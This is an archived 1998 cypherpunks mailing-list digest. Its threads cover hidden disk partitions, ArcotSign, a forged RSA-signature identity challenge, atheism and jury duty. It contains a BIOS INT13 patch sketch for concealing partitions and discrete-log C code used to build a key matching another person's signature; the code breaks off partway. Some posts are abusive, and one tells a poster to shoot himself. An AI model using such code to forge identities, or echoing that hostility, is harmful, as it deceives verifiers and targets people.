Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809230223.VAA07985@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 20:29:28 -0400
> From: Sunder <sunder@brainlink.com>
> Subject: Re: Stego-empty hard drives... (fwd)

> Why would they implement it when they can simply have their software scan the
> BIOS code if that's what they feared?  It may cost them $10k each, but it'll
> cost them millions to design and scan every notebook type on the planet, and

No, again, they only have to scan the BIOS types and there are only a couple
thousand (if that many) of those. It really isn't that complicated, there are
only a few cpu's, there are only a few glue chip sets, only a few video driver
chip sets, only a few LCD panels, etc. Admitted when multiplied together
there are a lot of combinations. Now the board manufacturers, the BIOS
manufacturers, and the various glue chipset makers get together and share
data and the manufacturers look to their marketing to define their target
point. Then they do a cost analysis on the chipset combo's and pretty soon 
you find the market only handles a handful of fundamentaly different
machines.

If there was as much variety at the hardware level as you assume nobody
could afford to introduce new computers every few months.

> then they'll have to get their hands on newer models as soon as they hit the
> market.  You're talking about a project that's bigger in magnitude than the
> NSA.

No it isn't. All it takes to get the BIOS before it hits the market is get a
license agreement with the BIOS manufacturer. Hell, when I worked at
Compu-Add we did this sort of stuff with Award and Phoenix all the time. We
would get alpha copies to test in our new hardware on a regular basis.

> Why should YOUR BIOS need to contain encryption code or device drivers for that
> matter?  All it needs to do is to HIDE the existance of the extra partition. 

And the code in the BIOS which means it needs to be hidden just like some 
viruses.

Realisticaly it isn't this complicated. All one needs to do is write a
program that allows the operator to talk directly to the hard drive
controller. At that point it's a trivial matter to go out and find those
hidden partitions. You could use normal drive recovery software if you had a
mind, and that only costs a few hundred to a few thousand dollars and can be
bought in the back of Computer Shopper.

> You patch your BIOS by replacing a few bytes of code with CALL's and NOP's. 
> Maybe 4-8 bytes at most to modify.  The routine that checks for the track range
> is only several bytes:
> 
> 
> Somehwere in INT13 code:
>             blah
>             blah
>             blah
>             CALL biospatch
>             NOP ; to fill in the overwritten code to the next opcode
> 
> 
> biospatch  PUSH AX         ;save the register if you need it
>            MOV AX,switch   ;get the value of the hack switch switch
>            JE  popbye
>            POP AX
>            CMP AX,1234 ;or whatever register or whatever value
>            JLE bye
> deny       MOV AL,FAIL ;some reg and some value that says error, likely AL
>            RET
>            
> popbye     POP AX
> bye        ;insert the code that you overwrote with your CALL to this patch
> re           
>            RET
> 
> 
> Homework: Someone please take this code, optimize it for size and build a TSR
> patching INT 13 that JIM can install and run under DOS.

Don't bother, I already know how to do that.

This would stand out like a sore thumb.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Tue, 22 Sep 1998 14:35:45 +0800
To: cypherpunks@Algebra.COM
Subject: Re: ArcotSign
In-Reply-To: <199809221821.UAA24448@replay.com>
Message-ID: <Pine.BSF.3.96.980922212127.15969A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 22 Sep 1998, Anonymous wrote:
[On Arcot's virtual smartcard claims] 
> The analogy with smart cards is that these cards protect your private key.
> With a perfect smart card, an attacker can't do any better than chance
> guessing of your private key.  With the Arcot system, the same is true.
> Decrypting the private key file gives no information about its content,
> because pure random data is encrypted.  Therefore with their system the
> attacker also can't do better than chance guessing.

With Arcot's system, an attacker could determine the key *software only,
most likely even by remote*.

Extracting keys from a smartcard requires *hardware and physical possesion
of the token*.

Which touches at the very core of the difference between
tokens and software based solutions. The claims made on the vendor's
homepage are simply false. There is no other way of putting it.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@spe.com
Date: Tue, 22 Sep 1998 16:01:14 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: atheism (was: RE: Democracy... (fwd)) (fwd)
In-Reply-To: <199809202202.RAA14798@einstein.ssz.com>
Message-ID: <4932-Tue22Sep1998220112+0200-pjm@spe.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
[ A bunch of gratuitously obnoxious nonsense indicating a lack of
  reading comprehension skills coupled with no capacity for critical
  thinking. ]

     That makes two rude replies in a row in response to polite
messages.  I'll give anyone the benefit of one bad hair day, but
further discussion with you is obviously a waste of time.  I do thank
you for demonstrating that "transcendence" is not a null concept,
however.  You are without a doubt a transcendent asshole.

     I retire from this discussion and yield the floor to you,
Mr. Choate.  It is only fitting, seeing as you've gone to such trouble
to deposit that large pile of fecal matter in the middle of it.

Regards,

pjm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 23 Sep 1998 00:11:47 +0800
To: cypherpunks@cyberpass.net
Subject: new sci am articles on encryption
Message-ID: <199809230513.WAA16966@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



the new issue of scientific american features
articles on encryption and hacking. one is
by Phil Zimmermann, on public key cryptography.

A policy article by Rivest (of RSA) argues
against encryption restrictions in the US.

a long article on internet hacking and breaking
and entering describes the basic process
that hackers use.

Rivest uses the analogy of "gloves" for
encryption, in the sense that we shouldn't
outlaw gloves because the govt needs always
to obtain fingerprints for identification.
furthermore, "key escrow" is like gluing
fingerprint copies to the bottoms of gloves,
another waste of time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Tue, 22 Sep 1998 17:15:09 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809221500.KAA03503@einstein.ssz.com>
Message-ID: <36122097.335221357@news>
MIME-Version: 1.0
Content-Type: text/plain



On 22 Sep 1998 15:19:09 -0500, Sunder <sunder@brainlink.com> wrote:

>You could always compress the fuck out of the data and save it as 2d bar codes
>(PDF417) in a printed book, or to photographic slides...

Yea.  And when customs asks, just say that they're 2d stereograms (the kind
where neat stuff appears if you stare at them crosseyed long enough).  

-- Phelix




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@spe.com
Date: Tue, 22 Sep 1998 15:59:26 +0800
To: cypherpunks@cyberpass.net
Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)
In-Reply-To: <199809202202.RAA14798@einstein.ssz.com>
Message-ID: <6442-Tue22Sep1998222346+0200-pjm@spe.com>
MIME-Version: 1.0
Content-Type: text/plain



attila writes:
 >     agreed, the strong v. weak atheist argument is _impossible_. 

     I'll try one last time and then let this grossly off-topic thread
continue without me.

     The weak atheist position is a _lack_ of belief.  No knowledge
claim is made.  This position can come from a number of perspectives,
one common one being that the concept denoted by the word "god" is
incoherent.  If a concept is without meaning then it doesn't make
sense to claim to believe that it doesn't exist; such a claim would
itself be incoherent.

     The strong atheist position that god(s) do not exist does
constitute a knowledge claim.  It implies that the holder of the
position associates a particular, meaningful concept with the word
"god".  It doesn't, however, indicate anything about the other beliefs
of the atheist in question.

     There must be some 'net law regarding the effort required to make
a point being inversely proportional to the complexity and importance
of that point....

Regards,

pjm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 23 Sep 1998 01:33:45 +0800
To: attila <cypherpunks@toad.com>
Subject: Re: This is a listed crime?
In-Reply-To: <199809211700.MAA17197@einstein.ssz.com>
Message-ID: <3.0.5.32.19980922231122.00907100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:50 PM 9/21/98 +0000, attila wrote:
>    "I dont know nuthin' 'bout it" 

Double negatives are your friend :-)

>    agreed, in theory. but how do you protect yourself when two or more
>    take the stand and swear under oath that you said: "......" or, even:

Yeah.  The times I've known the facts in cop-vs-citizen cases,
the cops have often been lying; I have to assume that they're often lying
in cases when I don't know the facts as well.  Of course, getting
somebody with that kind of attitude about cops onto a jury 
is somewhat unlikely, but occasionally you'll find neutrals.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 23 Sep 1998 01:23:44 +0800
To: Duncan Frissell <guy@panix.com>
Subject: Re: This is a listed crime?
In-Reply-To: <Pine.BSF.3.96.980921142104.397Q-100000@hun.org>
Message-ID: <3.0.5.32.19980922231717.0090ba10@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:39 PM 9/21/98 -0400, Duncan Frissell wrote:
>False.  You are never required to talk to a peace officer, Fed, or
>investigator unless you want to.  They can arrest you of course (with
>probable cause ha ha).  Even then, you still don't have to talk to them.
>In criminal cases you *never* have to talk to anyone.

The Supremes have, unfortunately, decided that police can hold you
for up to 48 hours without getting around to charging you,
and if there's a weekend around they can often stretch that.
Some cops find that an interesting answer to the question
"You've read me my Miranda rights and now you're insisting
that I tell you what you want before I can speak to my lawyer who's
in the next room?" "Yup, you can be as silent as you want in the
county jail, and [since we're charging you with a bogus municipal charge anyway],
we can charge you with a [bogus] misdemeanor instead.",
which had a certain craftiness I hadn't really expected out of them :-)


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 23 Sep 1998 01:31:26 +0800
To: Michael Motyka <rah@shipwright.com>
Subject: Re: Stego-empty hard drives...
In-Reply-To: <v04011743b229a12c2f0b@[139.167.130.247]>
Message-ID: <3.0.5.32.19980922232331.0090ed40@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:06 PM 9/21/98 -0700, Michael Motyka wrote:
>Robert Hettinga wrote:
>> Stegoing an encrypted partition as "blank" hard drive space without
>> actually writing over it unless you wanted to?
>> 
>A freshly formatted partition has a fill value. Noise would indicate
>that is is not fresh. This would not be proof that it contained
>encrypted data but it would indicate some sort of use. 

Microsoft Mail and some of its broken successors keep your mail in
one big hulking file using "compressible encryption",
which may not be good enough to keep the NSA out,
but is good enough crypto to keep you from fixing it when
it gets corrupted.  
It's really a shame how often MSMail files get corrupted,
and how quickly the things can grow to 100-200MB if people from
Marketing keep sending you mail with attached Powerpoint files.
Does anybody know a compressed disk driver that lets you start
at an arbitrary offset in a file so the headers look fine?

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strawman@ehmail.com
Date: Tue, 22 Sep 1998 22:34:53 +0800
To: joe cypherpunk <cypherpunks@toad.com>
Subject: Does God know Peano Algebra?
Message-ID: <199809230329.XAA11796@web05.iname.net>
MIME-Version: 1.0
Content-Type: text/plain



or does she not care if strong atheists couldnt reason their way out of a trap made of Boolean presumptions?

a little bit of knowledge is a dangerous thing, but zero knowlege is absolutely subversive...

---------------------------------------------------

--------------------------------------------------------------------
Get free personalized email from Canada.com at http://www.ehmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 22 Sep 1998 23:07:13 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Speaking of political consims - Land of the Free (fwd) [fun]
Message-ID: <199809230435.XAA08530@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From consim-l-return-15556-ravage=ssz.com@net.uni-c.dk Tue Sep 22 23:33:14 1998
Mailing-List: contact consim-l-help@net.uni-c.dk; run by ezmlm
Reply-To: consim-l@net.uni-c.dk
Delivered-To: mailing list consim-l@net.uni-c.dk
Date: Wed, 23 Sep 1998 04:04:54 +0000 (GMT)
From: Tracy Johnson <tmj@primenet.com>
To: consim-l@net.uni-c.dk
Subject: Re: Speaking of political consims - Land of the Free
In-Reply-To: <85037379.36082228@aol.com>
Message-ID: <Pine.BSI.3.96.980923040158.6538C-100000@usr09.primenet.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Actually Justin Thyme has been doing these games for years with our
player teams at conventions, but without computers.

On Tue, 22 Sep 1998 BillR54619@aol.com wrote:

> In a message dated 9/22/98 5:18:24 PM Eastern Daylight Time,
> olboggy@hotmail.com writes:
> 
> Hasbeen Interactive announces its new, Java-enabled, interactive WWW gaming
> experience, BILLOMACY. "Billomacy" extends the concepts pioneered in the
> classic TAHGC game, DIPLOMACY, placing you in a virtual social computing world
> full of sovereign, petty, and touchy players. How many of them can YOU piss
> off, and still stay in the game ? For the goal of BILLOMACY is not to win, but
> to keep the game going for as long as you can. Chat and email functions allow
> you to communicate with the other players almost instantaneously, to plot your
> vast right wing conspiracies, or to indulge in hurling anathemas in the form
> of press releases. The possibilities are endless !! Each game lasts as long as
> you want to keep playing, from just one evening, or until kingdom come.
> BILLOMACY supports an infinite number of strategies and playing styles, from
> the passive-aggressive "Kaiser Wilhelm" mode to the sneaky, unprincipled,
> "Guilliame Talleyrand" mode, not to mention the famous "Wild Bill" cowboy
> mode, and of course, the ultimate in popularity, "Bill Clinton, Secret Agent
> Man", which allows you to enter our special "adults only" area for phone sex
> and other goodies. And for the spiritually inclined, we have included the high
> toned "Billy Graham" sermonizing option, for a low extra price. BILLOMACY, the
> favorite interactive game of (who else) Bill Gates, is an experience we think
> you'll really like !!
> 
> ---
> 
> Bill R.

Tracy Johnson
tmj@primenet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 22 Sep 1998 18:15:31 +0800
To: nobody@replay.com
Subject: Re: CHALLENGE response
In-Reply-To: <199809220601.IAA30078@replay.com>
Message-ID: <199809222241.XAA11854@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Kudos anonymous!

What form are your primes (did you use Maurers idea to increase the
relative hardness of factoring compared to discrete log, or did you
just use more smaller primes?)  How many primes have you used, and how
many CPU hours did it take to calculate the discrete log to discover e?

Also is the code for finding discrete logs given the prime
factorisation of the modulus available?

Obvious counter-measures to this attack on a persistent anonymous
identity are to post more than one signature, or to sign the public
key (as would happen with a self signed PGP public key).

I am left wondering if there are implications of this demonstration
for other protocols (*) involving RSA signatures, where one signed
message is observed before the key is obtained.

- For example, the general case of receiving a message signed by
someone, not having the public key, and looking up the public key on a
key server by keyid (as pgp5.x, and some pgp2.x mail interfaces
automate).  With an anonymous individual (and with many peoples keys
where they have poor connection in the web of trust) all you are
aiming to do is to send a message to the author of a given message.
With this attack an attacker who could intercept the key server
lookup, and return an alternate public key with associated
certificates which would match the signature.
Are there other protocols where this attack would have implications?

Adam

(* Toto's impromptu 'protocol' was publishing one signature only, and
then having his machine seized containing the public (and private?)
keys which arguably created the signature).  The result of the
identity attack is that Toto's (currently unwanted) proof of
authorship has been called into question.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Jablon <dpj@world.std.com>
Date: Tue, 22 Sep 1998 22:50:41 +0800
To: Ben Laurie <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <3.0.5.32.19980922235214.00804100@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier wrote:
>> The advantages are that offline password guessing is impossible.

At 03:24 PM 9/22/98 +0100, Ben Laurie wrote:
> The 'I' word always makes me nervous - do you really mean that, or do
> you just mean "very difficult"?

Why be nervous?  It's not that hard to prevent off-line
guessing of the PIN, given access to just the client's stored
data.  Here "impossible" means "as hard as breaking your
favorite PK method".

Here are three ways of authenticating based on PIN + stored key
where the stored client data alone doesn't permit offline PIN
guessing.  These methods are arguably better than using a
simplistic PIN-encrypted private key, if you're concerned
about the client spilling its data.

(1)	Send the PIN separately, encrypted by the server's public key.
	Don't encrypt the private key with the PIN.  Make the server
	verify both PIN and private key to permit a transaction.

(2)	Use the PIN + stored data to derive the private key,
	in a way such that any PIN will also generate a valid
	private key.

(3)	Verify the PIN (or PIN-derived key) using
	password-authenticated key exchange.

Each of these approaches has other benefits and limitations.
>From the posted description, it sounds like Arcot is using (2),
where the PIN-encrypted data contains no verifiable plaintext.

-------------------------
David P. Jablon
dpj@world.std.com
<http://world.std.com/~dpj/>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 22 Sep 1998 23:30:29 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199809230453.XAA08741@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 23 Sep 1998 06:15:33 +0200
> From: Anonymous <nobody@replay.com>

> It is only rarely we get the sons of bitches on
> tape, and then you'll have to pardon us for 
> exploiting it.

Take what you can get and run like hell with it!

> The only regret is that Frank Zappa was not alive
> to put it all to music.

I hadn't even thought of the potential for yellow snow rides...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 22 Sep 1998 09:00:09 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809221245.HAA02410@einstein.ssz.com>
Message-ID: <3.0.5.32.19980923000131.007d6910@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 07:45 AM 9/22/98 -0500, Jim Choate wrote:
>Forwarded message:
>> From: "Neels Kriek" <kriek@bigfoot.com>
>> Subject: Re: Stego-empty hard drives... (fwd)
>> Date: Tue, 22 Sep 1998 01:52:03 -0500
>> I have bee using Encrypted magic Folders for a while now.  it gives you the
>> option of encrypting all files in a specific folder. it can also do file
>> name scrambling and even hide all the files in a directory from the OS.
>> 
>> It activates through a hot key combination.  You work on the files you want
>> and when you exit emf the whole dir is hidden again.  probably not the most
>> secure system but it will certainly fool most them if you disable booting
>> from a stiffy/floppy.
>
>The problem is this approach is detectible with a suitable 'virus scanner'
>technology. Even if the encrypted folders and such don't appear in the file
>system you have various other pieces of the processing agent that must sit
>around on the drive and hence are open to signature attacks.
>

The first assertion is not entirely accurate- I played with Magic Folders
for a while- it relies on a command, usu. in the autoexec.bat or win.ini
file (dos/windows environment) to load, with a bootable floppy disk these
commands would would be bypassed and the so-called "hidden" folder is in
plain sight. 

Reeza!

"...The world was on fire, but no one could save me but you...
	Strange what desire will make foolish people do...
		(and the background vocalists sang)
			This world is only gonna break your heart...."

					==C.I.==




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 23 Sep 1998 02:04:55 +0800
To: cypherpunks@Algebra.COM
Subject: Jury duty considered harmful, or at least rare
In-Reply-To: <Pine.BSF.3.96.980921165825.397U-100000@hun.org>
Message-ID: <v0313030fb22e4de0bcd6@[209.133.20.24]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:11 PM -0700 9/22/98, Bill Stewart wrote:

>Yeah.  The times I've known the facts in cop-vs-citizen cases,
>the cops have often been lying; I have to assume that they're often lying
>in cases when I don't know the facts as well.  Of course, getting
>somebody with that kind of attitude about cops onto a jury
>is somewhat unlikely, but occasionally you'll find neutrals.

I last served on a jury in 1973, 25 years ago, no doubt before many readers
of Cypherpunks were born.

And I've only received a single _possible_ summons since, in the 25 years
since that  one jury appearance.

Yet some of the apolitical numbskulls I know about have served on several
juries in the same time. The Poisson, as expected, or something more human?

Jury nullifying minds want to know.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 23 Sep 1998 02:11:14 +0800
To: "Kriston J. Rehberg" <kriston@ibm.net>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <v03130311b22e50575124@[209.133.20.24]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:38 PM -0700 9/22/98, Kriston J. Rehberg wrote:
>Would it be terribly difficult to remove the "coderpunks" list from the
>"To:" list on this thread?
>
>Thanks,


Kris,

Why are you spamming the Cypherpunks list with your drivel?


--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Tue, 22 Sep 1998 11:14:54 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <604c1f67fef5147bd9135cda03e0d7da@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




on 20 Sep 1998 at 09:52:24 Reeza! wrote:
> 
> At 09:21 PM 9/19/98 -0000, Anonymous wrote:
> >
> >What? To tell a lie is one thing, but ...[etc]

> It was prefaced with "...to tell the truth, the whole truth, and nothing
> but the truth...".
> Straighten out your head, you seem to be a few neurons short of a
> functional synapse.
> 
> Reeza!

I understand you think this is persuasive, but I don't understand why.

and then at Sun, 20 Sep 1998 15:26:05 Reeza! wrote:
> At 03:24 AM 9/20/98 -0000, Anonymous wrote:
> >
> >I agree it's bad. I agree it undermines the justice system a little bit.
> >But, ... impeachment?
> >
> 
> I could care less if he had an affair, personally. But he had an affair
> with a subordinate in his direct employ.
[more]

> I congratulate you for your defense of a person who demonstrably has broken
> his marriage vows, his oath of public office, and purjured himself while
> under an additional oath in a court of law.

You do remember from 6 hours earlier that we're talking about lieing?  
Your raising other issues is irrelevant. You're building up the bogey man.
[Jim Choate recently described this method as a "Strawman".] 
I suggested there are things Bill's done that are worse. Are you sure you're
disagreeing?

Do you have anything worthwhile to bring to the discussion?

> You, too, are a few neurons short of a functional synapse.
> 
> I suggest you discuss it with the maker. The best way is large caliber
> bullet at sufficient velocity to penetrate and exit the cranial cavity.
> 
> God speed, you fucking idiot.
> 

I guess not.

> Reeza!

-- an anonymous aol32 user.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harvest1@altavista.net
Date: Wed, 23 Sep 1998 02:54:40 +0800
Subject: churches
Message-ID: <eaep.3.0.reg. LeOZS.36062.200437963@mail.sosinet.net>
MIME-Version: 1.0
Content-Type: text/plain



Chruches, Pastors and Ministers:

To those of you that are searching.  I would like to invite you to view my web page.  You just may 
find something in there that may help you in your search.  

www2.sosinet.net/~harvest1/communion.htm 

Since, this message is a one time post only.  It is not necessary to respond.

Prophet Leamon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kriston J. Rehberg" <kriston@ibm.net>
Date: Wed, 23 Sep 1998 01:37:38 +0800
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <36089776.5641344B@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain



Would it be terribly difficult to remove the "coderpunks" list from the
"To:" list on this thread?

Thanks,

Kris

-- 
Kriston J. Rehberg
http://kriston.net/
AOL: Kriston                    endeavor to persevere
ICQ: 3535970




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Sep 1998 19:58:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CHALLENGE response
Message-ID: <199809230100.DAA27355@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> What form are your primes (did you use Maurers idea to increase the
> relative hardness of factoring compared to discrete log, or did you
> just use more smaller primes?)  How many primes have you used, and how
> many CPU hours did it take to calculate the discrete log to discover e?

N is the product of two primes, but each p-1 has about 16 small prime factors
(about 25-35 bits) to allow calculating the discrete log efficiently.  With
this choice of primes it took about three hours to run the discrete log.

> Also is the code for finding discrete logs given the prime
> factorisation of the modulus available?

Here you go.  This uses cryptolib by Jack Lacy of AT&T (not to be
confused with cryptlib by Peter Gutmann), available from
ftp://ftp.funet.fi/pub/crypt/cryptography/libs/cryptolib_1.1.tar.gz


/* Calculate discrete log using various algorithms */
/* Algorithms based on Handbook of Applied Cryptography by Menezes et al */

#include "libcrypt.h"


/* Modular multiplication - m1*m2 mod n */
static void
bigMultiplyN (BigInt m1, BigInt m2, BigInt n, BigInt result)
{
    BigInt tmp = bigInit(0);
    bigMultiply (m1, m2, tmp);
    bigMod (tmp, n, result);
    freeBignum (tmp);
}


/* Modular addition, m1+m2 mod n */
static void
bigAddN (BigInt m1, BigInt m2, BigInt n, BigInt result)
{
    bigAdd (m1, m2, result);
    if (bigCompare (result, n) >= 0)
        bigSubtract (result, n, result);
}


/* Iterate the pollard rho.  Modify x, a, b with next values */
static void
prhoiter (BigInt base, BigInt val, BigInt mod, BigInt order,
    BigInt *x, BigInt *a, BigInt *b)
{
    int xgroup;

    /* First decide what group x is in */
    /* This is a cheat to be fast */
    xgroup = ((unsigned)(*x)->num[0]+1) % 3;

    switch (xgroup) {
    case 0:
        bigMultiplyN (*x, val, mod, *x);
        bigAddN (*b, one, order, *b);
        break;
    case 1:
        bigMultiplyN (*x, *x, mod, *x);
        bigAddN (*a, *a, order, *a);
        bigAddN (*b, *b, order, *b);
        break;
    case 2:
        bigMultiplyN (*x, base, mod, *x);
        bigAddN (*a, one, order, *a);
        break;
    }
}


/* Pollard rho algorithm for discrete log */

BigInt
pollardrho (BigInt base, BigInt val, BigInt mod, BigInt order)
{
    BigInt
        x = bigInit(1),
        a = bigInit(0),
        b = bigInit(0),
        x2 = bigInit(1),
        a2 = bigInit(0),
        b2 = bigInit(0);
    int cnt = 0;

    for ( ; ; ) {
        prhoiter (base, val, mod, order, &x, &a, &b);
        prhoiter (base, val, mod, order, &x2, &a2, &b2);
        prhoiter (base, val, mod, order, &x2, &a2, &b2);
        if (bigCompare (x, x2) == 0)
            break;
        if (++cnt % 1000 == 0) {
            printf ("%d\r", cnt);
            fflush (stdout);
        }
    }
    if (cnt >= 1000)
        printf ("\n");

    if (bigCompare (b, b2) < 0)
        bigAdd (order, b, b);
    bigSubtract (b, b2, b);
    if (bigCompare (a2, a) < 0)
        bigAdd (order, a2, a2);
    bigSubtract (a2, a, a);
        
    if (bigCompare (b, zero) == 0) {
        printf ("Pollard rho failed\n");
        exit (1);
    }
    getInverse (b, order, b2);
    bigMultiplyN (a, b2, order, a);
    return a;
}


/*
 * Do the CRT with multiple congruences.  congs are the values that the
 * answer should be congruent to, mods are the moduli for each congruence.
 * n tells how many in each array.
 */
static BigInt
crtmult (BigInt congs[], BigInt mods[], int n)
{
    int i;
    BigInt prod = bigInit(0);
    BigInt prod1 = bigInit(0);
    BigInt sum = bigInit(0);
    BigInt quot = bigInit(0);
    BigInt rem = bigInit(0);
    BigInt dum = bigInit(0);
    BigInt inv = bigInit(0);
    BigInt term = bigInit(0);

    /* Compute product of moduli */
    bigCopy (one, prod);
    for (i=0; i<n; ++i) {
        bigMultiply (prod, mods[i], prod1);
        bigCopy (prod1, prod);
    }

    for (i=0; i<n; ++i) {
        bigDivide (prod, mods[i], quot, dum);
        bigDivide (quot, mods[i], dum, rem);
        getInverse (rem, mods[i], inv);
        bigMultiplyN (congs[i], quot, prod, term);
        bigMultiplyN (term, inv, prod, term);
        bigAddN (term, sum, prod, sum);
    }

    return sum;
}


/* Pohlig-Hellman discrete log algorithm for composites */
/* Return the exponent such that base^exponent == val modulo mod. */
/* Group order is product of factors[], of which there are n */
/* Assume each factor is to the first power */

BigInt
phlog (BigInt base, BigInt val, BigInt mod, BigInt factors[], int n)
{
    BigInt
        prod = bigInit(0),
        prod1 = bigInit(0),
        exp = bigInit(0),
        dum = bigInit(0),
        b = bigInit(0),
        v = bigInit(0);
    BigInt *dlogs;
    BigInt dl;
    int i;

    dlogs = (BigInt *) malloc (n * sizeof (BigInt));

    /* Compute product of factors to get group order */
    bigCopy (one, prod);
    for (i=0; i<n; ++i) {
        bigMultiply (prod, factors[i], prod1);
        bigCopy (prod1, prod);
    }

    /* Sanity check */
    bigPow (base, prod, mod, b);
    if (bigCompare (b, one) != 0) {
        printf ("Inconsistency in group order on b\n");
        fBigPrint (b, stdout);
    }
    bigPow (val, prod, mod, v);
    if (bigCompare (v, one) != 0) {
        printf ("Inconsistency in group order on v\n");
        fBigPrint (v, stdout);
    }

    for (i=0; i<n; ++i) {
        bigDivide (prod, factors[i], exp, dum);
